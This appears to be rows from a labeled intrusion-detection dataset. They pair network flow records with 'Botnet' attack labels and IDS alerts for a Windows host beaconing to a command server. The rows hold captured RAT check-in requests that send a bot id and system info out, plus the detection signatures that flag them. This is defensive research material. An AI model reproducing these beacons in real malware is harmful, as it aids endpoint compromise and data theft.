event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 2158, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3904041, event_type: anomaly, proto: TCP, tx_id: 0, anomaly_app_proto: http, anomaly_type: applayer, anomaly_event: UNABLE_TO_MATCH_RESPONSE_TO_REQUEST, anomaly_layer: proto_parser ; pcap_cnt: 3904043, event_type: http, proto: TCP, tx_id: 0, http_http_port: 0, http_url: /libhtp::request_uri_not_seen, http_http_content_type: text/html, http_status: 200, http_length: 0
false
Botnet
true
13:04:34
65,578
Friday
[]
291
attack
1,233,457
192.168.10.9-1848-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3910265, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:04:44
80,894
Friday
[{'timestamp': '2017-07-07T13:04:44.675000+0000', 'flow_id': 1302429621294031, 'pcap_cnt': 3910265, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1848, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:44.594895+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobThAAIAGT+7AqAoJza6lSQc4H5DXsWp43W36S1ARAQAwfgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:04:44.675000+0000', 'flow_id': 1302429621294031, 'pcap_cnt': 3910265, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1848, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:44.594895+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobThAAIAGT+7AqAoJza6lSQc4H5DXsWp43W36S1ARAQAwfgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,233,723
192.168.10.9-1851-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3919095, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:04:54
82,700
Friday
[{'timestamp': '2017-07-07T13:04:54.824648+0000', 'flow_id': 520320372331718, 'pcap_cnt': 3919095, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1851, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:54.742598+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocgxAAIAGSxrAqAoJza6lSQc7H5CZiWvTJPJXclARAQDInQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:04:54.824648+0000', 'flow_id': 520320372331718, 'pcap_cnt': 3919095, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1851, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:54.742598+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocgxAAIAGSxrAqAoJza6lSQc7H5CZiWvTJPJXclARAQDInQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,234,013
192.168.10.9-1852-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3922414, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:04
91,198
Friday
[{'timestamp': '2017-07-07T13:05:04.933313+0000', 'flow_id': 279394182552781, 'pcap_cnt': 3922414, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1852, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:04.842957+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAociFAAIAGSwXAqAoJza6lSQc8H5DXLsqMYDaNz1ARAQC6nAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:04.933313+0000', 'flow_id': 279394182552781, 'pcap_cnt': 3922414, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1852, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:04.842957+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAociFAAIAGSwXAqAoJza6lSQc8H5DXLsqMYDaNz1ARAQC6nAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,094
192.168.10.9-1853-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3924877, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:14
78,399
Friday
[{'timestamp': '2017-07-07T13:05:15.016462+0000', 'flow_id': 474054985929668, 'pcap_cnt': 3924877, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1853, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:14.938948+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoci9AAIAGSvfAqAoJza6lSQc9H5BWW371Ei1oAVARAQD63QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:15.016462+0000', 'flow_id': 474054985929668, 'pcap_cnt': 3924877, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1853, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:14.938948+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoci9AAIAGSvfAqAoJza6lSQc9H5BWW371Ei1oAVARAQD63QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,139
192.168.10.9-1854-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3927178, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:25
76,298
Friday
[{'timestamp': '2017-07-07T13:05:25.107658+0000', 'flow_id': 1025953989229854, 'pcap_cnt': 3927178, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1854, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:25.032030+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocjxAAIAGSurAqAoJza6lSQc+H5BNiBArQs7ouVARAQDBIAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:25.107658+0000', 'flow_id': 1025953989229854, 'pcap_cnt': 3927178, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1854, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:25.032030+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocjxAAIAGSurAqAoJza6lSQc+H5BNiBArQs7ouVARAQDBIAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,207
192.168.10.9-1857-205.174.165.73-8080-6
['flow', 'http']
